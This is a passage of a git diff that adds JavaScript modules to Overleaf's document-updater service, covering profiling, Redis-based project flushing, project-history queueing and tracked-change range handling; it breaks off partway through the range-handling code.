+++ b/services/document-updater/app/js/Profiler.js
@@ -0,0 +1,68 @@
+/* eslint-disable
+    no-unused-vars,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS206: Consider reworking classes to avoid initClass
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+let Profiler
+const Settings = require('@overleaf/settings')
+const logger = require('@overleaf/logger')
+
+const deltaMs = function (ta, tb) {
+  const nanoSeconds = (ta[0] - tb[0]) * 1e9 + (ta[1] - tb[1])
+  const milliSeconds = Math.floor(nanoSeconds * 1e-6)
+  return milliSeconds
+}
+
+module.exports = Profiler = (function () {
+  Profiler = class Profiler {
+    static initClass() {
+      this.prototype.LOG_CUTOFF_TIME = 15 * 1000
+      this.prototype.LOG_SYNC_CUTOFF_TIME = 1000
+    }
+
+    constructor(name, args) {
+      this.name = name
+      this.args = args
+      this.t0 = this.t = process.hrtime()
+      this.start = new Date()
+      this.updateTimes = []
+      this.totalSyncTime = 0
+    }
+
+    log(label, options = {}) {
+      const t1 = process.hrtime()
+      const dtMilliSec = deltaMs(t1, this.t)
+      this.t = t1
+      this.totalSyncTime += options.sync ?
dtMilliSec : 0 + this.updateTimes.push([label, dtMilliSec]) // timings in ms + return this // make it chainable + } + + end(message) { + const totalTime = deltaMs(this.t, this.t0) + const exceedsCutoff = totalTime > this.LOG_CUTOFF_TIME + const exceedsSyncCutoff = this.totalSyncTime > this.LOG_SYNC_CUTOFF_TIME + if (exceedsCutoff || exceedsSyncCutoff) { + // log anything greater than cutoffs + const args = {} + for (const k in this.args) { + const v = this.args[k] + args[k] = v + } + args.updateTimes = this.updateTimes + args.start = this.start + args.end = new Date() + args.status = { exceedsCutoff, exceedsSyncCutoff } + logger.warn(args, this.name) + } + return totalTime + } + } + Profiler.initClass() + return Profiler +})() diff --git a/services/document-updater/app/js/ProjectFlusher.js b/services/document-updater/app/js/ProjectFlusher.js new file mode 100644 index 0000000..33d585b --- /dev/null +++ b/services/document-updater/app/js/ProjectFlusher.js @@ -0,0 +1,139 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const request = require('request') +const Settings = require('@overleaf/settings') +const RedisManager = require('./RedisManager') +const { rclient } = RedisManager +const docUpdaterKeys = Settings.redis.documentupdater.key_schema +const async = require('async') +const ProjectManager = require('./ProjectManager') +const _ = require('lodash') +const logger = require('@overleaf/logger') +const { promisifyAll } = require('@overleaf/promise-utils') + +const ProjectFlusher = { + // iterate over keys asynchronously using redis scan (non-blocking) + // handle all the cluster nodes or single redis server + _getKeys(pattern, limit, callback) { + const nodes = (typeof rclient.nodes === 'function' + ? rclient.nodes('master') + : undefined) || [rclient] + const doKeyLookupForNode = (node, cb) => + ProjectFlusher._getKeysFromNode(node, pattern, limit, cb) + return async.concatSeries(nodes, doKeyLookupForNode, callback) + }, + + _getKeysFromNode(node, pattern, limit, callback) { + if (limit == null) { + limit = 1000 + } + let cursor = 0 // redis iterator + const keySet = {} // use hash to avoid duplicate results + const batchSize = limit != null ? 
Math.min(limit, 1000) : 1000 + // scan over all keys looking for pattern + const doIteration = ( + cb // avoid hitting redis too hard + ) => + node.scan( + cursor, + 'MATCH', + pattern, + 'COUNT', + batchSize, + function (error, reply) { + let keys + if (error != null) { + return callback(error) + } + ;[cursor, keys] = Array.from(reply) + for (const key of Array.from(keys)) { + keySet[key] = true + } + keys = Object.keys(keySet) + const noResults = cursor === '0' // redis returns string results not numeric + const limitReached = limit != null && keys.length >= limit + if (noResults || limitReached) { + return callback(null, keys) + } else { + return setTimeout(doIteration, 10) + } + } + ) + return doIteration() + }, + + // extract ids from keys like DocsWithHistoryOps:57fd0b1f53a8396d22b2c24b + // or docsInProject:{57fd0b1f53a8396d22b2c24b} (for redis cluster) + _extractIds(keyList) { + const ids = (() => { + const result = [] + for (const key of Array.from(keyList)) { + const m = key.match(/:\{?([0-9a-f]{24})\}?/) // extract object id + result.push(m[1]) + } + return result + })() + return ids + }, + + flushAllProjects(options, callback) { + logger.info({ options }, 'flushing all projects') + return ProjectFlusher._getKeys( + docUpdaterKeys.docsInProject({ project_id: '*' }), + options.limit, + function (error, projectKeys) { + if (error != null) { + logger.err({ err: error }, 'error getting keys for flushing') + return callback(error) + } + const projectIds = ProjectFlusher._extractIds(projectKeys) + if (options.dryRun) { + return callback(null, projectIds) + } + const jobs = _.map( + projectIds, + projectId => cb => + ProjectManager.flushAndDeleteProjectWithLocks( + projectId, + { background: true }, + cb + ) + ) + return async.parallelLimit( + async.reflectAll(jobs), + options.concurrency, + function (error, results) { + const success = [] + const failure = [] + _.each(results, function (result, i) { + if (result.error != null) { + return failure.push(projectIds[i]) + } else { + return success.push(projectIds[i]) + } + }) + logger.info( + { successCount: success.length, failureCount: failure.length }, + 'finished flushing all projects' + ) + return callback(error, { success, failure }) + } + ) + } + ) + }, +} + +module.exports = ProjectFlusher +module.exports.promises = promisifyAll(ProjectFlusher) diff --git a/services/document-updater/app/js/ProjectHistoryRedisManager.js b/services/document-updater/app/js/ProjectHistoryRedisManager.js new file mode 100644 index 0000000..9a9985d --- /dev/null +++ b/services/document-updater/app/js/ProjectHistoryRedisManager.js @@ -0,0 +1,245 @@ +// @ts-check + +const Settings = require('@overleaf/settings') +const { callbackifyAll } = require('@overleaf/promise-utils') +const projectHistoryKeys = Settings.redis?.project_history?.key_schema +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.project_history +) +const logger = require('@overleaf/logger') +const metrics = require('./Metrics') +const { docIsTooLarge } = require('./Limits') +const { addTrackedDeletesToContent, extractOriginOrSource } = require('./Utils') +const HistoryConversions = require('./HistoryConversions') +const OError = require('@overleaf/o-error') + +/** + * @import { Ranges } from './types' + */ + +const ProjectHistoryRedisManager = { + async queueOps(projectId, ...ops) { + // Record metric for ops pushed onto queue + for (const op of ops) { + metrics.summary('redis.projectHistoryOps', op.length, { status: 'push' }) + } + + // Make sure that this 
MULTI operation only operates on project + // specific keys, i.e. keys that have the project id in curly braces. + // The curly braces identify a hash key for Redis and ensures that + // the MULTI's operations are all done on the same node in a + // cluster environment. + const multi = rclient.multi() + // Push the ops onto the project history queue + multi.rpush( + projectHistoryKeys.projectHistoryOps({ project_id: projectId }), + ...ops + ) + // To record the age of the oldest op on the queue set a timestamp if not + // already present (SETNX). + multi.setnx( + projectHistoryKeys.projectHistoryFirstOpTimestamp({ + project_id: projectId, + }), + Date.now() + ) + const result = await multi.exec() + return result[0] + }, + + async queueRenameEntity( + projectId, + projectHistoryId, + entityType, + entityId, + userId, + projectUpdate, + originOrSource + ) { + projectUpdate = { + pathname: projectUpdate.pathname, + new_pathname: projectUpdate.newPathname, + meta: { + user_id: userId, + ts: new Date(), + }, + version: projectUpdate.version, + projectHistoryId, + } + projectUpdate[entityType] = entityId + + const { origin, source } = extractOriginOrSource(originOrSource) + + if (origin != null) { + projectUpdate.meta.origin = origin + if (origin.kind !== 'editor') { + projectUpdate.meta.type = 'external' + } + } else if (source != null) { + projectUpdate.meta.source = source + if (source !== 'editor') { + projectUpdate.meta.type = 'external' + } + } + + logger.debug( + { projectId, projectUpdate }, + 'queue rename operation to project-history' + ) + const jsonUpdate = JSON.stringify(projectUpdate) + + return await ProjectHistoryRedisManager.queueOps(projectId, jsonUpdate) + }, + + async queueAddEntity( + projectId, + projectHistoryId, + entityType, + entityId, + userId, + projectUpdate, + originOrSource + ) { + let docLines = projectUpdate.docLines + let ranges + if (projectUpdate.historyRangesSupport && projectUpdate.ranges) { + docLines = addTrackedDeletesToContent( + docLines, + projectUpdate.ranges.changes ?? [] + ) + ranges = HistoryConversions.toHistoryRanges(projectUpdate.ranges) + } + + projectUpdate = { + pathname: projectUpdate.pathname, + docLines, + url: projectUpdate.url, + meta: { + user_id: userId, + ts: new Date(), + }, + version: projectUpdate.version, + hash: projectUpdate.hash, + metadata: projectUpdate.metadata, + projectHistoryId, + createdBlob: projectUpdate.createdBlob ?? 
false, + } + if (ranges) { + projectUpdate.ranges = ranges + } + projectUpdate[entityType] = entityId + + const { origin, source } = extractOriginOrSource(originOrSource) + + if (origin != null) { + projectUpdate.meta.origin = origin + if (origin.kind !== 'editor') { + projectUpdate.meta.type = 'external' + } + } else if (source != null) { + projectUpdate.meta.source = source + if (source !== 'editor') { + projectUpdate.meta.type = 'external' + } + } + + logger.debug( + { projectId, projectUpdate }, + 'queue add operation to project-history' + ) + const jsonUpdate = JSON.stringify(projectUpdate) + + return await ProjectHistoryRedisManager.queueOps(projectId, jsonUpdate) + }, + + async queueResyncProjectStructure( + projectId, + projectHistoryId, + docs, + files, + opts + ) { + logger.debug({ projectId, docs, files }, 'queue project structure resync') + const projectUpdate = { + resyncProjectStructure: { docs, files }, + projectHistoryId, + meta: { + ts: new Date(), + }, + } + if (opts.resyncProjectStructureOnly) { + projectUpdate.resyncProjectStructureOnly = opts.resyncProjectStructureOnly + } + const jsonUpdate = JSON.stringify(projectUpdate) + return await ProjectHistoryRedisManager.queueOps(projectId, jsonUpdate) + }, + + /** + * Add a resync doc update to the project-history queue + * + * @param {string} projectId + * @param {string} projectHistoryId + * @param {string} docId + * @param {string[]} lines + * @param {Ranges} ranges + * @param {string[]} resolvedCommentIds + * @param {number} version + * @param {string} pathname + * @param {boolean} historyRangesSupport + * @return {Promise<number>} the number of ops added + */ + async queueResyncDocContent( + projectId, + projectHistoryId, + docId, + lines, + ranges, + resolvedCommentIds, + version, + pathname, + historyRangesSupport + ) { + logger.debug( + { projectId, docId, lines, version, pathname }, + 'queue doc content resync' + ) + + let content = lines.join('\n') + if (historyRangesSupport) { + content = addTrackedDeletesToContent(content, ranges.changes ?? 
[]) + } + + const projectUpdate = { + resyncDocContent: { content, version }, + projectHistoryId, + path: pathname, + doc: docId, + meta: { + ts: new Date(), + }, + } + + if (historyRangesSupport) { + projectUpdate.resyncDocContent.ranges = + HistoryConversions.toHistoryRanges(ranges) + projectUpdate.resyncDocContent.resolvedCommentIds = resolvedCommentIds + } + + const jsonUpdate = JSON.stringify(projectUpdate) + // Do an optimised size check on the docLines using the serialised + // project update length as an upper bound + const sizeBound = jsonUpdate.length + if (docIsTooLarge(sizeBound, lines, Settings.max_doc_length)) { + throw new OError( + 'blocking resync doc content insert into project history queue: doc is too large', + { projectId, docId, docSize: sizeBound } + ) + } + return await ProjectHistoryRedisManager.queueOps(projectId, jsonUpdate) + }, +} + +module.exports = { + ...callbackifyAll(ProjectHistoryRedisManager), + promises: ProjectHistoryRedisManager, +} diff --git a/services/document-updater/app/js/ProjectManager.js b/services/document-updater/app/js/ProjectManager.js new file mode 100644 index 0000000..781ed0e --- /dev/null +++ b/services/document-updater/app/js/ProjectManager.js @@ -0,0 +1,341 @@ +const RedisManager = require('./RedisManager') +const ProjectHistoryRedisManager = require('./ProjectHistoryRedisManager') +const DocumentManager = require('./DocumentManager') +const HistoryManager = require('./HistoryManager') +const async = require('async') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') +const Errors = require('./Errors') +const { promisifyAll } = require('@overleaf/promise-utils') + +function flushProjectWithLocks(projectId, _callback) { + const timer = new Metrics.Timer('projectManager.flushProjectWithLocks') + const callback = function (...args) { + timer.done() + _callback(...args) + } + + RedisManager.getDocIdsInProject(projectId, (error, docIds) => { + if (error) { + return callback(error) + } + const errors = [] + const jobs = docIds.map(docId => callback => { + DocumentManager.flushDocIfLoadedWithLock(projectId, docId, error => { + if (error instanceof Errors.NotFoundError) { + logger.warn( + { err: error, projectId, docId }, + 'found deleted doc when flushing' + ) + callback() + } else if (error) { + logger.error({ err: error, projectId, docId }, 'error flushing doc') + errors.push(error) + callback() + } else { + callback() + } + }) + }) + + logger.debug({ projectId, docIds }, 'flushing docs') + async.series(jobs, () => { + if (errors.length > 0) { + callback(new Error('Errors flushing docs. 
See log for details')) + } else { + callback(null) + } + }) + }) +} + +function flushAndDeleteProjectWithLocks(projectId, options, _callback) { + const timer = new Metrics.Timer( + 'projectManager.flushAndDeleteProjectWithLocks' + ) + const callback = function (...args) { + timer.done() + _callback(...args) + } + + RedisManager.getDocIdsInProject(projectId, (error, docIds) => { + if (error) { + return callback(error) + } + const errors = [] + const jobs = docIds.map(docId => callback => { + DocumentManager.flushAndDeleteDocWithLock(projectId, docId, {}, error => { + if (error) { + logger.error({ err: error, projectId, docId }, 'error deleting doc') + errors.push(error) + } + callback() + }) + }) + + logger.debug({ projectId, docIds }, 'deleting docs') + async.series(jobs, () => + // When deleting the project here we want to ensure that project + // history is completely flushed because the project may be + // deleted in web after this call completes, and so further + // attempts to flush would fail after that. + HistoryManager.flushProjectChanges(projectId, options, error => { + if (errors.length > 0) { + callback(new Error('Errors deleting docs. See log for details')) + } else if (error) { + callback(error) + } else { + callback(null) + } + }) + ) + }) +} + +function queueFlushAndDeleteProject(projectId, callback) { + RedisManager.queueFlushAndDeleteProject(projectId, error => { + if (error) { + logger.error( + { projectId, error }, + 'error adding project to flush and delete queue' + ) + return callback(error) + } + Metrics.inc('queued-delete') + callback() + }) +} + +function getProjectDocsTimestamps(projectId, callback) { + RedisManager.getDocIdsInProject(projectId, (error, docIds) => { + if (error) { + return callback(error) + } + if (docIds.length === 0) { + return callback(null, []) + } + RedisManager.getDocTimestamps(docIds, (error, timestamps) => { + if (error) { + return callback(error) + } + callback(null, timestamps) + }) + }) +} + +function getProjectDocsAndFlushIfOld( + projectId, + projectStateHash, + excludeVersions, + _callback +) { + const timer = new Metrics.Timer('projectManager.getProjectDocsAndFlushIfOld') + const callback = function (...args) { + timer.done() + _callback(...args) + } + + RedisManager.checkOrSetProjectState( + projectId, + projectStateHash, + (error, projectStateChanged) => { + if (error) { + logger.error( + { err: error, projectId }, + 'error getting/setting project state in getProjectDocsAndFlushIfOld' + ) + return callback(error) + } + // we can't return docs if project structure has changed + if (projectStateChanged) { + return callback( + new Errors.ProjectStateChangedError('project state changed') + ) + } + // project structure hasn't changed, return doc content from redis + RedisManager.getDocIdsInProject(projectId, (error, docIds) => { + if (error) { + logger.error( + { err: error, projectId }, + 'error getting doc ids in getProjectDocs' + ) + return callback(error) + } + // get the doc lines from redis + const jobs = docIds.map(docId => cb => { + DocumentManager.getDocAndFlushIfOldWithLock( + projectId, + docId, + (err, lines, version) => { + if (err) { + logger.error( + { err, projectId, docId }, + 'error getting project doc lines in getProjectDocsAndFlushIfOld' + ) + return cb(err) + } + const doc = { _id: docId, lines, v: version } // create a doc object to return + cb(null, doc) + } + ) + }) + async.series(jobs, (error, docs) => { + if (error) { + return callback(error) + } + callback(null, docs) + }) + }) + } + ) +} + +function 
clearProjectState(projectId, callback) { + RedisManager.clearProjectState(projectId, callback) +} + +function updateProjectWithLocks( + projectId, + projectHistoryId, + userId, + updates, + projectVersion, + source, + _callback +) { + const timer = new Metrics.Timer('projectManager.updateProject') + const callback = function (...args) { + timer.done() + _callback(...args) + } + + let projectSubversion = 0 // project versions can have multiple operations + let projectOpsLength = 0 + + function handleUpdate(update, cb) { + update.version = `${projectVersion}.${projectSubversion++}` + switch (update.type) { + case 'add-doc': + ProjectHistoryRedisManager.queueAddEntity( + projectId, + projectHistoryId, + 'doc', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + break + case 'rename-doc': + if (!update.newPathname) { + // an empty newPathname signifies a delete, so there is no need to + // update the pathname in redis + ProjectHistoryRedisManager.queueRenameEntity( + projectId, + projectHistoryId, + 'doc', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + } else { + // rename the doc in redis before queuing the update + DocumentManager.renameDocWithLock( + projectId, + update.id, + userId, + update, + projectHistoryId, + error => { + if (error) { + return cb(error) + } + ProjectHistoryRedisManager.queueRenameEntity( + projectId, + projectHistoryId, + 'doc', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + } + ) + } + break + case 'add-file': + ProjectHistoryRedisManager.queueAddEntity( + projectId, + projectHistoryId, + 'file', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + break + case 'rename-file': + ProjectHistoryRedisManager.queueRenameEntity( + projectId, + projectHistoryId, + 'file', + update.id, + userId, + update, + source, + (error, count) => { + projectOpsLength = count + cb(error) + } + ) + break + default: + cb(new Error(`Unknown update type: ${update.type}`)) + } + } + + async.eachSeries(updates, handleUpdate, error => { + if (error) { + return callback(error) + } + if ( + HistoryManager.shouldFlushHistoryOps( + projectOpsLength, + updates.length, + HistoryManager.FLUSH_PROJECT_EVERY_N_OPS + ) + ) { + HistoryManager.flushProjectChangesAsync(projectId) + } + callback() + }) +} + +module.exports = { + flushProjectWithLocks, + flushAndDeleteProjectWithLocks, + queueFlushAndDeleteProject, + getProjectDocsTimestamps, + getProjectDocsAndFlushIfOld, + clearProjectState, + updateProjectWithLocks, +} + +module.exports.promises = promisifyAll(module.exports) diff --git a/services/document-updater/app/js/RangesManager.js b/services/document-updater/app/js/RangesManager.js new file mode 100644 index 0000000..c146afd --- /dev/null +++ b/services/document-updater/app/js/RangesManager.js @@ -0,0 +1,577 @@ +// @ts-check + +const RangesTracker = require('@overleaf/ranges-tracker') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') +const Metrics = require('./Metrics') +const _ = require('lodash') +const { isInsert, isDelete, isComment, getDocLength } = require('./Utils') + +/** + * @import { Comment, CommentOp, InsertOp, DeleteOp, HistoryOp, Op } from './types' + * @import { HistoryCommentOp, HistoryDeleteOp, HistoryInsertOp, HistoryRetainOp } from './types' + * @import { HistoryDeleteTrackedChange, 
HistoryUpdate, Ranges, TrackedChange, Update } from './types' + */ + +const RANGE_DELTA_BUCKETS = [0, 1, 2, 3, 4, 5, 10, 20, 50] + +const RangesManager = { + MAX_COMMENTS: 500, + MAX_CHANGES: 2000, + + /** + * Apply an update to the given doc (lines and ranges) and return new ranges + * + * @param {string} projectId + * @param {string} docId + * @param {Ranges} ranges - ranges before the updates were applied + * @param {Update[]} updates + * @param {string[]} newDocLines - the document lines after the updates were applied + * @param {object} opts + * @param {boolean} [opts.historyRangesSupport] - whether history ranges support is enabled + * @returns {{ newRanges: Ranges, rangesWereCollapsed: boolean, historyUpdates: HistoryUpdate[] }} + */ + applyUpdate(projectId, docId, ranges, updates, newDocLines, opts = {}) { + if (ranges == null) { + ranges = {} + } + if (updates == null) { + updates = [] + } + const { changes, comments } = _.cloneDeep(ranges) + const rangesTracker = new RangesTracker(changes, comments) + const [emptyRangeCountBefore, totalRangeCountBefore] = + RangesManager._emptyRangesCount(rangesTracker) + const historyUpdates = [] + for (const update of updates) { + const trackingChanges = Boolean(update.meta?.tc) + rangesTracker.track_changes = trackingChanges + if (update.meta?.tc) { + rangesTracker.setIdSeed(update.meta.tc) + } + const historyOps = [] + for (const op of update.op) { + let croppedCommentOps = [] + if (opts.historyRangesSupport) { + historyOps.push( + getHistoryOp(op, rangesTracker.comments, rangesTracker.changes) + ) + if (isDelete(op) && trackingChanges) { + // If a tracked delete overlaps a comment, the comment must be + // cropped. The extent of the cropping is calculated before the + // delete is applied, but the cropping operations are applied + // later, after the delete is applied. + croppedCommentOps = getCroppedCommentOps(op, rangesTracker.comments) + } + } else if (isInsert(op) || isDelete(op)) { + historyOps.push(op) + } + rangesTracker.applyOp(op, { user_id: update.meta?.user_id }) + if (croppedCommentOps.length > 0) { + historyOps.push( + ...croppedCommentOps.map(op => + getHistoryOpForComment(op, rangesTracker.changes) + ) + ) + } + } + if (historyOps.length > 0) { + historyUpdates.push({ ...update, op: historyOps }) + } + } + + if ( + rangesTracker.changes?.length > RangesManager.MAX_CHANGES || + rangesTracker.comments?.length > RangesManager.MAX_COMMENTS + ) { + throw new Error('too many comments or tracked changes') + } + + try { + // This is a consistency check that all of our ranges and + // comments still match the corresponding text + rangesTracker.validate(newDocLines.join('\n')) + } catch (err) { + logger.error( + { err, projectId, docId, newDocLines, updates }, + 'error validating ranges' + ) + throw err + } + + const [emptyRangeCountAfter, totalRangeCountAfter] = + RangesManager._emptyRangesCount(rangesTracker) + const rangesWereCollapsed = + emptyRangeCountAfter > emptyRangeCountBefore || + totalRangeCountAfter + 1 < totalRangeCountBefore // also include the case where multiple ranges were removed + // monitor the change in range count, we may want to snapshot before large decreases + if (totalRangeCountAfter < totalRangeCountBefore) { + Metrics.histogram( + 'range-delta', + totalRangeCountBefore - totalRangeCountAfter, + RANGE_DELTA_BUCKETS, + { status_code: rangesWereCollapsed ? 
'saved' : 'unsaved' } + ) + } + const newRanges = RangesManager._getRanges(rangesTracker) + logger.debug( + { + projectId, + docId, + changesCount: newRanges.changes?.length, + commentsCount: newRanges.comments?.length, + rangesWereCollapsed, + }, + 'applied updates to ranges' + ) + return { newRanges, rangesWereCollapsed, historyUpdates } + }, + + acceptChanges(projectId, docId, changeIds, ranges, lines) { + const { changes, comments } = ranges + logger.debug(`accepting ${changeIds.length} changes in ranges`) + const rangesTracker = new RangesTracker(changes, comments) + rangesTracker.removeChangeIds(changeIds) + const newRanges = RangesManager._getRanges(rangesTracker) + return newRanges + }, + + deleteComment(commentId, ranges) { + const { changes, comments } = ranges + logger.debug({ commentId }, 'deleting comment in ranges') + const rangesTracker = new RangesTracker(changes, comments) + rangesTracker.removeCommentId(commentId) + const newRanges = RangesManager._getRanges(rangesTracker) + return newRanges + }, + + /** + * + * @param {object} args + * @param {string} args.docId + * @param {string[]} args.acceptedChangeIds + * @param {TrackedChange[]} args.changes + * @param {string} args.pathname + * @param {string} args.projectHistoryId + * @param {string[]} args.lines + */ + getHistoryUpdatesForAcceptedChanges({ + docId, + acceptedChangeIds, + changes, + pathname, + projectHistoryId, + lines, + }) { + /** @type {(change: TrackedChange) => boolean} */ + const isAccepted = change => acceptedChangeIds.includes(change.id) + + const historyOps = [] + + // Keep ops in order of offset, with deletes before inserts + const sortedChanges = changes.slice().sort(function (c1, c2) { + const result = c1.op.p - c2.op.p + if (result !== 0) { + return result + } else if (isInsert(c1.op) && isDelete(c2.op)) { + return 1 + } else if (isDelete(c1.op) && isInsert(c2.op)) { + return -1 + } else { + return 0 + } + }) + + const docLength = getDocLength(lines) + let historyDocLength = docLength + for (const change of sortedChanges) { + if (isDelete(change.op)) { + historyDocLength += change.op.d.length + } + } + + let unacceptedDeletes = 0 + for (const change of sortedChanges) { + /** @type {HistoryOp | undefined} */ + let op + + if (isDelete(change.op)) { + if (isAccepted(change)) { + op = { + p: change.op.p, + d: change.op.d, + } + if (unacceptedDeletes > 0) { + op.hpos = op.p + unacceptedDeletes + } + } else { + unacceptedDeletes += change.op.d.length + } + } else if (isInsert(change.op)) { + if (isAccepted(change)) { + op = { + p: change.op.p, + r: change.op.i, + tracking: { type: 'none' }, + } + if (unacceptedDeletes > 0) { + op.hpos = op.p + unacceptedDeletes + } + } + } + + if (!op) { + continue + } + + /** @type {HistoryUpdate} */ + const historyOp = { + doc: docId, + op: [op], + meta: { + ...change.metadata, + ts: Date.now(), + doc_length: docLength, + pathname, + }, + } + + if (projectHistoryId) { + historyOp.projectHistoryId = projectHistoryId + } + + if (historyOp.meta && historyDocLength !== docLength) { + historyOp.meta.history_doc_length = historyDocLength + } + + historyOps.push(historyOp) + + if (isDelete(change.op) && isAccepted(change)) { + historyDocLength -= change.op.d.length + } + } + + return historyOps + }, + + _getRanges(rangesTracker) { + // Return the minimal data structure needed, since most documents won't have any + // changes or comments + + const response = {} + if (rangesTracker.changes != null && rangesTracker.changes.length > 0) { + response.changes = rangesTracker.changes 
+ } + if (rangesTracker.comments != null && rangesTracker.comments.length > 0) { + response.comments = rangesTracker.comments + } + return response + }, + + _emptyRangesCount(ranges) { + let emptyCount = 0 + let totalCount = 0 + for (const comment of ranges.comments || []) { + totalCount++ + if (comment.op.c === '') { + emptyCount++ + } + } + for (const change of ranges.changes || []) { + totalCount++ + if (change.op.i != null) { + if (change.op.i === '') { + emptyCount++ + } + } + } + return [emptyCount, totalCount] + }, +} + +/** + * Calculate ops to be sent to the history system. + * + * @param {Op} op - the editor op + * @param {TrackedChange[]} changes - the list of tracked changes in the + * document before the op is applied. That list, coming from + * RangesTracker is ordered by position. + * @returns {HistoryOp} + */ +function getHistoryOp(op, comments, changes, opts = {}) { + if (isInsert(op)) { + return getHistoryOpForInsert(op, comments, changes) + } else if (isDelete(op)) { + return getHistoryOpForDelete(op, changes) + } else if (isComment(op)) { + return getHistoryOpForComment(op, changes) + } else { + throw new OError('Unrecognized op', { op }) + } +} + +/** + * Calculate history ops for an insert + * + * Inserts are moved forward by tracked deletes placed strictly before the + * op. When an insert is made at the same position as a tracked delete, the + * insert is placed before the tracked delete. + * + * We also add a commentIds property when inserts are made inside a comment. + * The current behaviour is to include the insert in the comment only if the + * insert is made strictly inside the comment. Inserts made at the edges are + * not included in the comment. + * + * @param {InsertOp} op + * @param {Comment[]} comments + * @param {TrackedChange[]} changes + * @returns {HistoryInsertOp} + */ +function getHistoryOpForInsert(op, comments, changes) { + let hpos = op.p + let trackedDeleteRejection = false + const commentIds = new Set() + + for (const comment of comments) { + if (comment.op.p < op.p && op.p < comment.op.p + comment.op.c.length) { + // Insert is inside the comment; add the comment id + commentIds.add(comment.op.t) + } + } + + // If it's determined that the op is a tracked delete rejection, we have to + // calculate its proper history position. If multiple tracked deletes are + // found at the same position as the insert, the tracked deletes that come + // before the tracked delete that was actually rejected offset the history + // position. + let trackedDeleteRejectionOffset = 0 + for (const change of changes) { + if (!isDelete(change.op)) { + // We're only interested in tracked deletes + continue + } + + if (change.op.p < op.p) { + // Tracked delete is before the op. Move the op forward. + hpos += change.op.d.length + } else if (change.op.p === op.p) { + // Tracked delete is at the same position as the op. + if (op.u && change.op.d.startsWith(op.i)) { + // We're undoing and the insert matches the start of the tracked + // delete. RangesManager treats this as a tracked delete rejection. We + // will note this in the op so that project-history can take the + // appropriate action. + trackedDeleteRejection = true + + // The history must be updated to take into account all preceding + // tracked deletes at the same position + hpos += trackedDeleteRejectionOffset + + // No need to continue. All subsequent tracked deletes are after the + // insert. + break + } else { + // This tracked delete does not match the insert. 
Note its length in
+        // case we find a tracked delete that matches later.
+        trackedDeleteRejectionOffset += change.op.d.length
+      }
+    } else {
+      // Tracked delete is after the insert. Tracked deletes are ordered, so
+      // we know that all subsequent tracked deletes will be after the insert
+      // and we can bail out.
+      break
+    }
+  }
+
+  /** @type {HistoryInsertOp} */
+  const historyOp = { ...op }
+  if (commentIds.size > 0) {
+    historyOp.commentIds = Array.from(commentIds)
+  }
+  if (hpos !== op.p) {
+    historyOp.hpos = hpos
+  }
+  if (trackedDeleteRejection) {
+    historyOp.trackedDeleteRejection = true
+  }
+  return historyOp
+}
+
+/**
+ * Calculate history op for a delete
+ *
+ * Deletes are moved forward by tracked deletes placed before or at the position of the
+ * op. If a tracked delete is inside the delete, the delete is split in parts
+ * so that characters are deleted around the tracked delete, but the tracked
+ * delete itself is not deleted.
+ *
+ * @param {DeleteOp} op
+ * @param {TrackedChange[]} changes
+ * @returns {HistoryDeleteOp}
+ */
+function getHistoryOpForDelete(op, changes, opts = {}) {
+  let hpos = op.p
+  const opEnd = op.p + op.d.length
+  /** @type HistoryDeleteTrackedChange[] */
+  const changesInsideDelete = []
+  for (const change of changes) {
+    if (change.op.p <= op.p) {
+      if (isDelete(change.op)) {
+        // Tracked delete is before or at the position of the incoming delete.
+        // Move the op forward.
+        hpos += change.op.d.length
+      } else if (isInsert(change.op)) {
+        const changeEnd = change.op.p + change.op.i.length
+        const endPos = Math.min(changeEnd, opEnd)
+        if (endPos > op.p) {
+          // Part of the tracked insert is inside the delete
+          changesInsideDelete.push({
+            type: 'insert',
+            offset: 0,
+            length: endPos - op.p,
+          })
+        }
+      }
+    } else if (change.op.p < op.p + op.d.length) {
+      // Tracked change inside the deleted text. Record it for the history system.
+      if (isDelete(change.op)) {
+        changesInsideDelete.push({
+          type: 'delete',
+          offset: change.op.p - op.p,
+          length: change.op.d.length,
+        })
+      } else if (isInsert(change.op)) {
+        changesInsideDelete.push({
+          type: 'insert',
+          offset: change.op.p - op.p,
+          length: Math.min(change.op.i.length, opEnd - change.op.p),
+        })
+      }
+    } else {
+      // We've seen all tracked changes before or inside the delete
+      break
+    }
+  }
+
+  /** @type {HistoryDeleteOp} */
+  const historyOp = { ...op }
+  if (hpos !== op.p) {
+    historyOp.hpos = hpos
+  }
+  if (changesInsideDelete.length > 0) {
+    historyOp.trackedChanges = changesInsideDelete
+  }
+  return historyOp
+}
+
+/**
+ * Calculate history ops for a comment
+ *
+ * Comments are moved forward by tracked deletes placed before or at the
+ * position of the op. If a tracked delete is inside the comment, the length of
+ * the comment is extended to include the tracked delete.
+ *
+ * @param {CommentOp} op
+ * @param {TrackedChange[]} changes
+ * @returns {HistoryCommentOp}
+ */
+function getHistoryOpForComment(op, changes) {
+  let hpos = op.p
+  let hlen = op.c.length
+  for (const change of changes) {
+    if (!isDelete(change.op)) {
+      // We're only interested in tracked deletes
+      continue
+    }
+
+    if (change.op.p <= op.p) {
+      // Tracked delete is before or at the position of the incoming comment.
+      // Move the op forward.
+      hpos += change.op.d.length
+    } else if (change.op.p < op.p + op.c.length) {
+      // Tracked delete inside the comment. Extend the length
+      hlen += change.op.d.length
+    } else {
+      // We've seen all tracked deletes before or inside the comment
+      break
+    }
+  }
+
+  /** @type {HistoryCommentOp} */
+  const historyOp = { ...op }
+  if (hpos !== op.p) {
